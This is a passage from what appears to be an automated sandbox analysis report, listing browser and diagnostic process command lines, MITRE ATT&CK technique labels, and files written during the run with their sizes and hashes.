  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4552 --field-trial-handle=1828,i,12786498223498762487,13098442620829426086,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2400

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024063005.000\NetworkDiagnostics.debugreport.xml

Filesize
69KB

MD5
7dda008ad4229daba6b1b885c726675f

SHA1
0d8244d06a2790fe5811434715462740320ce49f

SHA256
c74bcb52f06dc3fcd3e4d18f433381765008a9d62e5f9a22b3609148969e89c8

SHA512
9fe6ff194464322a92fec856901834f44c40f082ae3f6fd31bbddcc5c626daa6a0c17b336295bc15a6a2f7b3bfc881f75649d26088f0f7501d0d7099a4737ce3

Download Submit
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024063005.000\results.xsl

Filesize
47KB

MD5
90df783c6d95859f3a420cb6af1bafe1

SHA1
3fe1e63ca5efc0822fc3a4ae862557238aa22f78

SHA256
06db605b5969c93747313e6409ea84bdd8b7e1731b7e6e3656329d77bcf51093

SHA512
e5dcbb7d8f42eabf42966fccee11c3d3e3f965ecc7a4d9e4ecd0382a31c4e8afea931564b1c6931f6d7e6b3650dc01a4a1971e317dab6c1f03932c6b6b7d399f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
a23dccce635d7d469c7ba16c78ac239e

SHA1
ddf48a932819ddfa2e1bb22e613842a4270b4cc6

SHA256
08455a7be1dab9d305cbd9fc6b7c2cf94a6e761f0a3f121d2bee31eb966afe8a

SHA512
cdbfa16d82c17fd7f84c2579f997e5c2bfed9a93b6ee1bf42cc4496a319c4e6b9abdade245c4ba32480fe1871181178ea924e0a218946059a9998b4a08aa7b00

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
f4c46597475b99caeacdc34850f24169

SHA1
616ac82df4be8ac9f454b8ebece9aa629dcf5c9c

SHA256
78855a7c3b255c2dffe4116006707e2961667e66397c61194fa35b76cb47b444

SHA512
2dc8203fcba6fdf932ebada01537ca0596eb7d41c3c03faef580921069b8b63990efc582607db97b9f4156f80e7165ce55f1dde33e008a123c22e3998b1b8f66

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
54894936c8b5ed66b1ef7647659e3d15

SHA1
6b6c32fc9f9c41eb427a1a33eb4c2416e5e5c337

SHA256
60737b03b9f4096d1c7fd3e38bf5ea5d938205c84ad2b61929c1dd73ce147ab1

SHA512
77d9ce66c4ac37a654db4d9ab1cf8ce3d746efb44b266cec1debdc818d94cc4c2507879e3bc7574f2510f26d7690ca1052e12719b6585986b792c79b6858f551

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
eb46565ffffbda0d636e0da5e2e37461

SHA1
02755ec5940d01b9bac351ff09a06f82d134e284

SHA256
f8e949922607602487e0f3bf5f7f4b16c44f989689780f38a48a2d34f604d0c9

SHA512
526472703bf940a28c5a7577eaec5a6017019a16d9a0cbb4c5b6fbbfba78357990d93eed2e53f720a59e0db11c68b2eae51d904e838e3af0dabae4b20ba78187

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
8ca34006a4e029cf2c4244a361ef478c

SHA1
3a9870d4e0226c54feed9faf94b9750b77874a38

SHA256
19439cb0009b4371185ad5ccaff3ac3de360b5d587dd7eca9d278cef3b346cc7

SHA512
1bee7916ef9b21b494ed5fbfcce2fc30e97ce8159b6d5d9e272c9f1a7766a695037f0ebcc18dcd88365afaf9de4316c8d1bbefeb25a81aca8a2622fc4bfef5d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
1af28d9bb68a2b82958463484fa56675

SHA1
12d0b68215a068e505e0f777633e7cbb31565461

SHA256
a410a203de32383cdcf3627f6a04587560e95f9cc81d639ff0e95b38571de6db

SHA512
aaa04ae7bdd34f21d4695a281a7e5d78de92a3666ad22fe7b14a417a51c9eaf92215d939a10744e02499c5b7c106895e0bed6bf2dda01ec78f64a3f9838ba63e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
272KB

MD5
3da9d50c8d03adf1d0b29081254fd689

SHA1
96381a4e11fde6ee89cc336f4646b8d886de483d

SHA256
eca85327679eebb50c8b2ef8a50f97ae4fef6b0974a0675b073c4263a5c4eda7

SHA512
5c29b8a353359f4545a78e8722dc007f49e86282b23f07830161d0d1f5cfe229fd12efc9d55b86b199682d130cde00ea19a048be968f98bb445e8e102e22e865

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
272KB

MD5
a3f7fb54535213c1ffef46e2c21ab300

SHA1
06d284b37a28efe84863733105d96e3b269919e3

SHA256
b6097fa7a7f77099a1bb1e357c230201fb7975df9cde0809dc45fdf99604dd84

SHA512
50e50a93f5bc96cdb913f61d5b9a6d2ecab7c81ff632e395be15e7737db61bc92d54970976e52f501651b6dc0d6123735a8cadd5a80210a1de752677b629af24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6876cbd342d4d6b236f44f52c50f780f

SHA1
a215cf6a499bfb67a3266d211844ec4c82128d83

SHA256
ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e

SHA512
dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c1c7e2f451eb3836d23007799bc21d5f

SHA1
11a25f6055210aa7f99d77346b0d4f1dc123ce79

SHA256
429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800

SHA512
2ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
6efbfae5d72738ecd8a93bc539933986

SHA1
ac01c61b6b99a707f6a09ae9a094b1d0f3fa95a0

SHA256
f9b20a4c9cd8db307ed3f491b1fbd425e934c973ca64f9faf53d83396581b87c

SHA512
c0903b9d45af4cc3a803679ee7c3afe5e7495f907de5b793dee9a4bc1748ad287918f7757bc857f49bae487a4bf4d61a968dac1250eaab71c768fc1a6533bd43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f0ea741c1db560629761c55dd487f091

SHA1
d7481f819b8cbcd8667a614f74f43697da4a2a2b

SHA256
4cfd423bf7b9bb6fbd923269919a6dd0b16509428ee3964a003b2a96867850b3

SHA512
e4425f01b4ab00d3b4da9083f9268cedef6f0fdc7db07cb331aab1dabbd5a2eb4cabc4e99231e193cde21763240bdc8869353da5d5dc76995e68020d12cebe88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c96cbba7e67386baa979aa5986ee83fd

SHA1
06e0c52bfaed22b7b4c164dc4c088f55abe21ff3

SHA256
9eb42f4190291ff56b81f1f104dffdcfeeedd0d62736b06b5bbae27d25b142d2

SHA512
d48b4c28cb45ad3e094a6eaa69e3e0bb5204c29960c7490d6dc3fd2f311d5f95d343866eb224bf5f64c87d97812d6cbaeeeb892b95326bfb2c464f5d392261f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
46971ef1e2aaaf3ca7b4b49ab86efc81

SHA1
f23ab704faa18970d2eaf63426903f1ce5063670

SHA256
f4f5975ffe7082433a5c003a2ff34c849202c5cdb0335d3bd33718dcb130f0b3

SHA512
b01ebb016b62a056608f6e79279915acd75b1446934bdbf7c1fa5912fbfc82f95f4d1541fc496812507096a7f194af202d37112827d75fe9242d552641105e4e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
23a342bb7e98f1d3718849bc6eb46a52

SHA1
3086229ffaab7cf1f105882d02c568b846d9861e

SHA256
c83b72cac186d993113cd0a542b5bbe65c72931b7d6a59eef03625bc1da36b43

SHA512
ae8b4e7f56128753ab43c5f3b475bb5ce133f67b2a4bbcb327f41cc708c2c3c9b224f68fcd61bcb4901ef2adb5a2130bb02170b14032043387afdabb7860a5bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
cc09d2c1eed1fdc1b0f01be0069c9d7e

SHA1
43e816a9bb4e2e042f08cff56167b8898e1f4815

SHA256
1abcd565ae7a77a87d133c4ed4446b5aaa9544841d23f8d5b5594c46051edb8d

SHA512
613daf483ac5c1855e9856188177383593f344c3c1ca24e4554d3361f3c05ada01496105d580a887f1a636286934c604788c61986f038799b00d86c79a9b5c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
709c0954e3f4b03829dfc2323b7df7cf

SHA1
2be01c1476e5a6adaf5059f8632b32b38d6328b1

SHA256
03458c90d0e970c732b2fe1c1de8c79ae6eb622afd4b66e07ca396bf7a107362

SHA512
4a5a6d5e739bcb2e2d74baf9ee9ab01096de125f5e5d14d50103c7e2e03f7eaf25bb0aec75f7c6a429d2dd89d57965223d39aacd38452e07de01fc4b6d89f92b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
1221304439a49a13afeafb308ab8b742

SHA1
e0f90d2872d949d9b0d21d8ab1070af470e56a4f

SHA256
cb7e3143d628100efcec1b42fee3fe7bea076f81db577a806abef39d0985c761

SHA512
9e782f449934b0c3c97f65dd6212f4125ae4556bf7615a640a765cbe25ee1a3364e4709953854c25bca52b7904996288f6ff3322563da25e939814fd2f1cd985

Download Submit
C:\Users\Admin\AppData\Local\Temp\NDF73A4.tmp

Filesize
3KB

MD5
b0ddce7c00612b9a8e5135345460a6d3

SHA1
fb3dadf85cbfd930780932b6111c1561cff2f1df

SHA256
bd1f4e6b7a4a4d4b4f3353c755b417eaa3b9d3bd5451817d9cd673d5a0f1994e

SHA512
369cdaaab48cc1a8eda94f2a811455ed66d91582e891aaa3b0e9a8549f350b724e34d32a2a339777b4f572ccec3b4b541db0421d2515796fa85e09e3867b9f35

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rs0ewswc.fgg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\TEMP\SDIAG_ac5370b9-667f-4513-98ad-53f5d393ad58\NetworkDiagnosticsTroubleshoot.ps1

Filesize
25KB

MD5
d0cfc204ca3968b891f7ce0dccfb2eda

SHA1
56dad1716554d8dc573d0ea391f808e7857b2206

SHA256
e3940266b4368c04333db89804246cb89bf2073626f22b8de72bea27c522282a

SHA512
4d2225b599ad8af8ba8516f12cfddca5ec0ce69c5c80b133a6a323e9aaf5e0312efbcfa54d2e4462a5095f9a7c42b9d5b39f3204e0be72c3b1992cf33b22087c

Download Submit
C:\Windows\TEMP\SDIAG_ac5370b9-667f-4513-98ad-53f5d393ad58\UtilityFunctions.ps1

Filesize
53KB

MD5
c912faa190464ce7dec867464c35a8dc

SHA1
d1c6482dad37720db6bdc594c4757914d1b1dd70

SHA256
3891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201

SHA512
5c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a

Download Submit
C:\Windows\TEMP\SDIAG_ac5370b9-667f-4513-98ad-53f5d393ad58\UtilitySetConstants.ps1

Filesize
2KB

MD5
0c75ae5e75c3e181d13768909c8240ba

SHA1
288403fc4bedaacebccf4f74d3073f082ef70eb9

SHA256
de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f

SHA512
8fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b

Download Submit
C:\Windows\TEMP\SDIAG_ac5370b9-667f-4513-98ad-53f5d393ad58\en-US\LocalizationData.psd1

Filesize
5KB

MD5
91f545459be2ff513b8d98c7831b8e54

SHA1
499e4aa76fc21540796c75ba5a6a47980ff1bc21

SHA256
1ccd68e58ead16d22a6385bb6bce0e2377ed573387bdafac3f72b62264d238ff

SHA512
469571a337120885ee57e0c73a3954d0280fa813e11709ee792285c046f6ddaf9be5583e475e627ea5f34e8e6fb723a4681289312f0e51dc8e9894492407b911

Download Submit
C:\Windows\Temp\SDIAG_ac5370b9-667f-4513-98ad-53f5d393ad58\DiagPackage.dll

Filesize
488KB

MD5
ec287e627bf07521b8b443e5d7836c92

SHA1
02595dde2bd98326d8608ee3ddabc481ddc39c3d

SHA256
35fa9f66ed386ee70cb28ec6e03a3b4848e3ae11c8375ba3b17b26d35bd5f694

SHA512
8465ae3ca6a4355888eecedda59d83806faf2682431f571185c31fb8a745f2ef4b26479f07aaf2693cd83f2d0526a1897a11c90a1f484a72f1e5965b72de9903

Download Submit
C:\Windows\Temp\SDIAG_ac5370b9-667f-4513-98ad-53f5d393ad58\en-US\DiagPackage.dll.mui

Filesize
17KB

MD5
44b3399345bc836153df1024fa0a81e1

SHA1
ce979bfdc914c284a9a15c4d0f9f18db4d984cdd

SHA256
502abf2efedb7f76147a95dc0755723a070cdc3b2381f1860313fd5f01c4fb4d

SHA512
a49ba1a579eedca2356f8a4df94b1c273e483ceace93c617cddee77f66e90682836c77cea58047320b2c2f1d0e23ee7efa3d8af71e8ee864faef7e68f233bec4

Download Submit
memory/1224-480-0x00000225F4170000-0x00000225F4192000-memory.dmp

Filesize
136KB

Download